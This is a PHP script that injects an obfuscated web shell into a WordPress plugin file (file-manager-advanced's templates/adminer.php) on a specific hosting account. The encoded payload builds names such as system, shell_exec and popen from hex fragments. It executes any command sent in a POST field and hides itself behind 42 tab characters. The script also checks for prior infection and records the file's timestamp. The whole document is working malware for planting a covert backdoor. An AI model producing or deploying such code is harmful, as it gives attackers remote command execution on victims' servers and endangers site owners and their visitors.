<?php $path = '/home/fdhrevqn/public_html/wp-content/plugins/file-manager-advanced/templates/adminer.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24mrk1%20%3D%20%2773%27%3B%24mrk2%20%3D%20%2768%27%3B%24mrk3%20%3D%20%2765%27%3B%24mrk4%20%3D%20%2778%27%3B%24mrk5%20%3D%20%2770%27%3B%24mrk6%20%3D%20%2774%27%3B%24mrk7%20%3D%20%2772%27%3B%24mrk8%20%3D%20%2761%27%3B%24mrk9%20%3D%20%276d%27%3B%24mrk10%20%3D%20%275f%27%3B%24mrk11%20%3D%20%2763%27%3B%24mrk12%20%3D%20%276e%27%3B%24mrk13%20%3D%20%276c%27%3B%24mrk14%20%3D%20%2769%27%3B%24mrk15%20%3D%20%2767%27%3B%24system_core1%20%3D%20pack%28%22H%2A%22%2C%20%24mrk1%20.%20%2779%27%20.%20%2773%27%20.%20%2774%27%20.%20%2765%27%20.%20%276d%27%29%3B%24system_core2%20%3D%20pack%28%22H%2A%22%2C%20%24mrk1%20.%20%24mrk2%20.%20%24mrk3%20.%20%276c%27%20.%20%276c%27%20.%20%275f%27%20.%20%2765%27%20.%20%2778%27%20.%20%2765%27%20.%20%2763%27%29%3B%24system_core3%20%3D%20pack%28%22H%2A%22%2C%20%2765%27%20.%20%24mrk4%20.%20%24mrk3%20.%20%2763%27%29%3B%24system_core4%20%3D%20pack%28%22H%2A%22%2C%20%24mrk5%20.%20%2761%27%20.%20%24mrk1%20.%20%2773%27%20.%20%24mrk6%20.%20%24mrk2%20.%20%2772%27%20.%20%2775%27%29%3B%24system_core5%20%3D%20pack%28%22H%2A%22%2C%20%2770%27%20.%20%276f%27%20.%20%24mrk5%20.%20%24mrk3%20.%20%276e%27%29%3B%24system_core6%20%3D%20pack%28%22H%2A%22%2C%20%24mrk1%20.%20%2774%27%20.%20%24mrk7%20.%20%2765%27%20.%20%24mrk8%20.%20%24mrk9%20.%20%24mrk10%20.%20%2767%27%20.%20%24mrk3%20.%20%2774%27%20.%20%24mrk10%20.%20%24mrk11%20.%20%276f%27%20.%20%24mrk12%20.%20%24mrk6%20.%20%2765%27%20.%20%276e%27%20.%20%24mrk6%20.%20%24mrk1%29%3B%24system_core7%20%3D%20pack%28%22H%2A%22%2C%20%24mrk5%20.%20%2763%27%20.%20%24mrk13%20.%20%276f%27%20.%20%2773%27%20.%20%2765%27%29%3B%24right_pad_string%20%3D%20pack%28%22H%2A%22%2C%20%2772%27%20.%20%24mrk14%20.%20%24mrk15%20.%20%24mrk2%20.%20%24mrk6%20.%20%24mrk10%20.%20%2770%27%20.%20%2761%27%20.%20%2764%27%20.%20%275f%27%20.%20%2773%27%20.%20%2774%27%20.%20%2772%27%20.%20%24mrk14%20.%20%276e%27%20.%20%2767%27%29%3Bif%28isset%28%24_POST%5B%24right_pad_string%5D%29%29%7B%24right_pad_string%3Dpack%28%22H%2A%22%2C%24_POST%5B%24right_pad_string%5D%29%3Bif%28function_exists%28%24system_core1%29%29%7B%24system_core1%28%24right_pad_string%29%3B%7Delseif%28function_exists%28%24system_core2%29%29%7Bprint%20%24system_core2%28%24right_pad_string%29%3B%7Delseif%28function_exists%28%24system_core3%29%29%7B%24system_core3%28%24right_pad_string%2C%24dchunk_record%29%3Bprint%20join%28%22%5Cn%22%2C%24dchunk_record%29%3B%7Delseif%28function_exists%28%24system_core4%29%29%7B%24system_core4%28%24right_pad_string%29%3B%7Delseif%28function_exists%28%24system_core5%29%26%26function_exists%28%24system_core6%29%26%26function_exists%28%24system_core7%29%29%7B%24pgrp_ent%3D%24system_core5%28%24right_pad_string%2C%22r%22%29%3Bif%28%24pgrp_ent%29%7B%24sym_ent%3D%24system_core6%28%24pgrp_ent%29%3B%24system_core7%28%24pgrp_ent%29%3Bprint%20%24sym_ent%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { $content = file_get_contents($path); if (strstr($content, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } } } die('!failed!');